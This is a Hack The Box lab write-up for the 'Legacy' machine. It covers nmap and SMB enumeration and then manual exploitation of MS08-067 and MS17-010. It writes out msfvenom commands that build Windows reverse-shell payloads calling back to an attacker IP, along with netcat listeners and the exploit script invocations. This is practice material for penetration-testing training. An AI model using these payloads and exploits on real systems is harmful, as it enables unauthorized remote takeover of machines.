HacktheBox - Legacy Writeup

27/08/2019

Initial Enumeration

1. Nmap Scan + nmapAutomator

Lets start with a scan of the target ip address:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.4

Along with the usual nmap scan, I found a tool that automates nmap scans which is useful for OSCP to enumerate targets automatically and quickly, called nmapAutomator from @21y4d

It allows you to run a set template of nmap scans: 

  • Quick: Shows all open ports quickly (~15 seconds)
  • Basic: Runs Quick Scan, then a runs more thorough scan on found ports (~5 minutes)
  • UDP: Runs "Basic" on UDP ports (~5 minutes)
  • Full: Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
  • Vulns: Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
  • Recon: Runs "Basic" scan "if not yet run", then suggests recon commands "i.e. gobuster, nikto, smbmap" based on the found ports, then prompts to automatically run them
  • All: Runs all the scans consecutively (~20-30 minutes)

Here are a few examples of some of the scans on the vulnerable machine: 

I found that nmapAutomator is a very useful tool to speed up the process of nmap enumeration on a target, it would be especially useful if there was more than one target at a time, allowing automatic recon of multiple machines. 

From the nmap scans, we see that only ports 137, 139 and 445 are open, which if we didnt already know, indicate that the machine is running a Windows OS. 

2. SMB Enumeration 

I used smbmap to see if there are any network shares and if we have any permissions on them, it turned out we didnt have any permissions. 

smbmap -H 10.10.10.4

3. Examining nmapAutomator Vulnerability Scan Results 

From the nmapAutomator vuln results, we see that it determined the machine may be vulnerable to MS08-067 which is an RCE vulnerablility in the Windows server service and MS17-010 which is an RCE vulnerablility against SMBv1.

Exploitation

4. Manually exploiting MS08-067 

As I am trying to not use metasploit as practice for OSCP, im going to use a python script from Jivoi from github to exploit MS08-067. 

For the python script to work on the vulnerable machine I have to generate a shellcode of my own to replace the default in the script. I'm going to use msfvenom for this: 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -a x86 --platform windows

Lets break down the msfvenom command: 

  • -p windows/shell_reverse_tcp - This is the payload which will connect back to my attacker machine. As it is as unstaged payload, it is possible to catch the connection with netcat - netcat cannot be used with staged payloads and something like metasploit's multi/handler should be used instead. 
  • LHOST=10.10.14.12 LPORT=443 EXITFUNC=thread - This defines the variables for the shellcode on which to connect back on. 
  • -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - These are bad characters which we are telling msfvenom not to use in the creation of the shellcode. 
  • -f python - Output the shellcode in the python format. 
  • -v shellcode - This sets the variable to shellcode and not the default, 'buf'.
  • -a x86  --platform windows - Set the architecture and OS of the target machine.

I created a file called MS08-067_exploit.py and coped the python script into it, and added the shellcode above to replace the default in the script.

We now need to make the created script file executable: 

chmod +x MS08-067_exploit.py  

Before being able to run the script, we have to set an option depending on the OS and language pack of our target. There are 7 different options: 

Based on our initial enumeration, we know that the target OS is windows XP and with it being a box in English, I made the decision to try option 6 first for our exploit. 

Lets start a netcat listener and await a connection from the target: 

nc -lvnp 443 

We are now set to run the script after adding our shellcode and confirming the option to use:

python MS08-067_exploit.py 10.10.10.4 6 445

We now have a connection from the vulnerable machine on our netcat listener!

As XP doesnt have the whoami command, I could normally use the command 'echo %username%' for most users but it doesnt produce a username, which is a sign we are running as SYSTEM. 

As kali has an executeable called 'whoami.exe' installed by default, we can use this to confirm our current user on the target as we can share the folder that it resides in over SMB by starting an SMB server on our attacker machine and connecting back to it from the target machine:

locate whoami.exe

smbserver.py a /usr/share/windows-binaries/

\\10.10.14.12\a\whoami.exe

5. Manually exploiting MS17-010

Again, I found a github page from helviojunior which contained a script called send_and_execute.py that has been proven to exploit MS17-010 on Windows XP. 

I copied the contents of the script onto my attacker machine and called it MS17-010_exploit.py, we need to make the file executable:

chmod +x MS17-010_exploit.py

We will again use msfvenom, but this time to create an executable to exploit the target: 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=8080 EXITFUNC=thread -f exe -a x86 --platform windows -o MS17_exploit.exe

Another prerequisite for the script to run correctly is to download a python script called mysmb.py and save it to the same directory as the exploit script.

Lets start another netcat listener:

nc -lvnp 8080

Time to execute our script and executable: 

python MS17-010_exploit.py 10.10.10.4 MS17_exploit.exe

We again have a connection on the machine as SYSTEM via netcat, I confirmed this with the same method used for MS08-067, via SMB to whoami.exe. 

And finally, as we are SYSTEM, we are able to grab the user and root flags.

The user.txt file was located in the user john's Desktop directory:

And of course, the root.txt file was located in the Administrator's Desktop directory: